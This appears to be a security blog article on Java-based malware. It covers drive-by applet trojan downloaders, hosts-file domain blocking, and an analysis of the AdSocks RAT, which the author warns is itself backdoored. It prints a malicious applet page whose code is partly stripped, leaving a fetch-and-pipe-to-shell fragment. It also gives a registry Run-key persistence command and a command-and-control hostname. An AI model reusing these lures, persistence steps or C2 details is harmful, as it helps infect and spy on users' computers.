AdSocks RAT — about the new Java trojan computer viruses

The programs that run on our computers are, from the point of view of their code content, of two main types : compiled and interpreted. The compiled programs are those who suffer a transformation from source code written by the programmer to machine code which consists of instructions that can be directly executed by the computer CPU, that’s why sometimes is called native code. This transformation is done via a compiler. Programs coded in C, C++, Delphi, Pascal for example, are compiled programs and due to their native code produced by the compilers, have the fastest execution speed.

Interpreted programs also called scripts, requires the presence of an interpreter installed in the host computer, which will be invoked at program run-time for generating the machine code from the source code. The interpreter is invoked each time the program(or script) run, it will read the source code sequences or commands one by one and will “translate” them in native code in real-time to be handled by the CPU. This sort of programs have the lowest execution speed and you see the reason: even a simple script generates a notable amount of activities in the computer. Examples of well known interpreted programming languages are : PHP, Perl, Ruby, ASP.

If I said the programs written in these programming languages have the lowest execution speed, I mean not them must be avoided. Interpreted programs have a tremendous role in certain  zones, for example in these days the Web can not be imagined without PHP. PHP together with ASP is the basement for blogs, forums and other type of websites. One of the biggest advantages of scripting languages is the platform independence, once the proper interpreter is installed a script based program can run on any operating system.

Trying to combine the advantages of a compiled program with the advantages of an interpreted one, the developers designed an intermediate form in which a computer program can be compiled. Languages as Java developed by Sun Microsystems, a subsidiary of Oracle Corporation or .NET programming language developed by Microsoft, uses an intermediate type of compilation resulting the so called virtual machine code as compilers output, and thus a virtual machine is required to do the final transformation from that virtual machine code, in native code for each computer architecture in part. In our examples, these “virtual machines” are Java Runtime Environment respectively Microsoft .NET Framework. The main advantage is the fast execution speed, while the platform independence is still kept.

Malware codes can be produced in any programming language without exceptions and for any operating systems, but the most preferred by the malware creators are obviously the most used. Since the vast majority of computers have the Java Runtime Environment installed, it’s clear why there is much more malicious PHP scripts, JavaScript and Java trojan viruses in the wild compared with, let’s say malicious Python or Perl scripts.

JavaScript is used for a zillion of tasks on the websites, from the tracking visitors to adding various functionalities to the site, building embedded graphical objects in the web page and so on. A lot of these tasks are executed invisible for the user, who is not aware of what is happening in the backstage when a website page is loaded and all the scripts contained in the page HTML code executed. Almost every browser has the option to disable JavaScript, there is a Firefox addon named NoScript that blocks the scripts from being executed, but that alter somehow the browsing experience and is not an acceptable option for the majority of users.

There is another option to protect yourself by the malicious scripts, to use services like AVG LinkScanner, McAfee Site Advisor or Dr.Web anti-virus link checker, a Firefox add-on. Other services are using the community ratings to establish if a website is safe or not, see Web of Trust browser add-on or URL Void. URL Void has also a reliable web pages Multiple Antivirus Engines scanner here.

A lot of these site advisors uses the malware domains lists provided by special crawling and scanning services . A such “crawling & scanning” service is malwarepatrol.com, the lists provided by them are free to use for non-commercial purposes. Along with the automated crawling system, users can also submit suspicious domains URLs for analysis and monitoring by this service. At a higher level in the network infrastructure for example ISPs or gateways, administrators can use malware domains lists to block the access to these domains with a web filter for example.

The malware block lists come in different formats covering a lot of the applications needs, one of the most interesting for the average users is the hosts file provided for Windows systems and MacOS.

hosts file in all Windows versions including Windows 7 has the following path :

%systemroot%\system32\drivers\etc\

it’s a simple text-based file and is used to bypass the DNS requests made by the system, kind of the “automatic redirection”.

For example if you add a line in this file with a text editor(notepad.exe)

127.0.0.1    blockeddomain.com

and try to navigate to blockeddomain.com, you will see that’s not possible. The web browser will not make any DNS requests for what is blockeddomain.com, instead will navigate “blindly” to 127.0.0.1, which is the loopback address meaning your own computer.

In conclusion, if we replace our hosts file with that provided by a security service like malwarepatrol.com and updated hourly, all possible requests for a malicious domain will be blocked, better said redirected to your own computer.

You can find a lot of the malware block lists over the Internet, the most complete I was able to find is that provided by clean-mx.de, which is a collection of  lists submitted by other crawling services including the one from the clean-mx.de, NetPilot.

However, keep in mind there is not 100% reliable solution for protecting your computer to get infected with malware, considering that every minute new malware raises.

One of the most infamous method to infect computers is using a Java drive-by applet.

Java applets are small executables used to add new features and dynamics to the web sites, to make them more attractive and “eye-catching”, so they are intended to run in the web browsers requiring the Java plug-in. A good example of using Java applets are some of the online-games. The operating systems implements some good security rules regarding the applets, they are running in a browser “sandbox”, preventing the access to the system files or other programs, shared libraries, operating system clipboard, generally speaking the access to the user files or local processes is restricted. The applets are allowed to open network connections only with the server who loaded them in the web browser.

In the case the applets are digitally signed by a certificate authority the security model is changed a bit, the applet is treated like any other program by the operating system.

The real threat of the malicious Java applets, come from those self-signed, these are the applets signed by their authors and there is no way to verify the information provided in signatures. When running, they trigger a security alert :

The application digital signature cannot be verified.

Do you want to run the application ?

Also in this security message, the name of the applet, the publisher and the originating server is provided. In the case of a malicious Java applet, here come into play the social-engineering, the hacker will self sign the applet with some well known and trustworthy software creators as Microsoft for publisher, trying to trick the user to run the application. Also a common technique is to use Java applets with :

height=1 pixel

widht=1 pixel

or even zero(o) pixels as dimensions, that’s a “no window” Java applet. The general category of the malicious Java applets is the trojan downloaders, a Java applet can not wreak too many havoc because of the security restrictions imposed by the operating system, but it can download and run using some programming tricks and the “help” of the innocent user, some very aggressive and dangerous trojans.

In a typical Java applet attack, the hacker will set a web page embedding the applet in the HTML source, will upload a real trojan in a file hosting system and will try to get as more as possible traffic to the “infected” web page. Analysis of a known malicious Java applet revealed that the applet drop and run in the temporary folder of the system, a visual basic script(vbs) file and a downloaded trojan. This is how the original web page HTML is looking, just to make yourself an idea :

<style type=text/css>
body {
background-color: black;
}
#box {
border: 2px double white;
font-family: Verdana;
margin-right:160px;
margin-left:160px;
background-color: white;
}
</style>

<body>
<br><br><br><br>
<div id=”box”>
<applet width=’500′ height=’500′ code=’Client.class’ archive=’Client.jar’>

<param name=’windows2′ value=”><param name=’unix1′ value=””>
<param name=’unix2′ value=””>

-O- | sh”>
<param name=’linux2′ value=””></applet>
</div><center>
<img src=”softpedia.gif” />
</center>
</body>

If the visitors of the web page will “trust” the fake publisher and run the application, the result is obvious : a computer infection with update.exe, see the above code.

As a recommendation, you can investigate in Internet Options > Security tab> Custom level, this will bring up the Security Settings,  check “Prompt(Recommended)” tick box under “Launching applications and unsafe files” option, or “Disable” if you are extremely concerned about your computer security.

The elaborated name of a member of the trojan horse viruses family is the RAT or Remote Administration Tool, it is a little size and hidden server which will run at every computer start-up and will connect to a Command & Control server, giving to the hacker full rights in the infected computer, he can manipulate files and processes without restrictions, can view desktop screenshots can view the computer webcam or can steal the passwords saved by the browsers. The label trojan horse it’s contextual and come from the fact the trojan is installed very often without the user consent, masquerading as a legit program, or in parallel with a legit program, being embedded in the installer file.

On the other hand, using a RAT for your needs, for example installing it in a computer with the user consent to troubleshoot that computer in the future or to download and upload files to that computer, that’s mean it can not be considered a trojan virus in this very special case, but a little server instead.

In Java programming language can be produced trojan horses as in almost any programming language. A good example of a Java trojan horse or Remote Administration Tool created by a spanish author can be found at sourceforge.net, it’s named Adsocks and now is at version 0.7.0.

It has as features :

• Remote Desktop
• Remote Command line
• Download and upload files
• Keylogger

This is the main interface :

and this is the builder interface :

As you see, the user can set the IP to which the RAT must connect, the password for connection, the port used, the name of  trojan dropped in the system root folder and the name of the registry entry used to run at start-up.

Obviously because it is a Java trojan virus, the server built has the extension .jar(server.jar) and has near 21 KB in size. When this is executed on the victim machine, another .jar file is dropped in system32 folder with the choosen name for the trojan–it will reside there from now on, and an entry in the registry is added under run key(HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\run) for autostart purpose, here are the report of the actions taken on the infected system, the name of the dropped trojan is IPlookup.jar :

[ Changes to filesystem ]
* Creates file C:\windows\system32\IPlookup.jar
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temp\config27926261669765384483.thf
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temp\config5905168662080842625.thf

[ Changes to registry ]
* Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\clsid\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}
* Creates value “startin’up=C:\Windows\system32\IPlookup.jar” in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\run

………………………

[ Network services ]
* Connects to “xx.yy.zz.aa” on port 5432.

[ Process/window information ]
* Keylogger functionality.
* Creates process “(null),reg add hklm\software\microsoft\windows\currentversion\run /v “startin’up” /t reg_sz /d “C:\Windows\system32\IPlookup.jar” /f,(null)”.
* Creates process “(null),javaw -jar C:\Windows\System32\IPlookup.jar,(null)”.

However, don’t be so quick to download and try this program unless you know what are you doing. The first two files dropped in the temporary folder:

• config27926261669765384483.thf     27,7KB
• config5905168662080842625.thf       35,8KB

is hidding a dangerous mystery. The first file viewed in a hexeditor begin with letters PK, that’s mean it’s a zip archive, PK come from the Phil Katz, creator of the compression utility PKZIP. If you change the extension of the first file in.zip and try to unzip it, the result will be 5 files and a folder named META-INF :

• key.class
• mensaje.class
• svd$keyh.class
• svd.class
• uninstall.lib

Very interesting is the hex view of svd.class, here it is a fragment of the hex editor window :

as you see a very very dubious URL inside the file :

http://ipl.dynupdate.no-ip.com and port 8245

Bear in mind this is not the address of the updating server of the program, so its presence in the code is very suspect. No-ip.com is a service heavily used by the hackers to point subdomains to their computer IP addresses, explanation is, in the case they have dynamic IPs, a domain is used for trojans as Command & Control server address instead of an IP.

This program, AdSocks seems to be itself backdoored, it has questionable sections of code and is not recommended to be used, or possibly the “wannabe” hunter(see hacker) will be hunted. You are warned now.

Keep safe !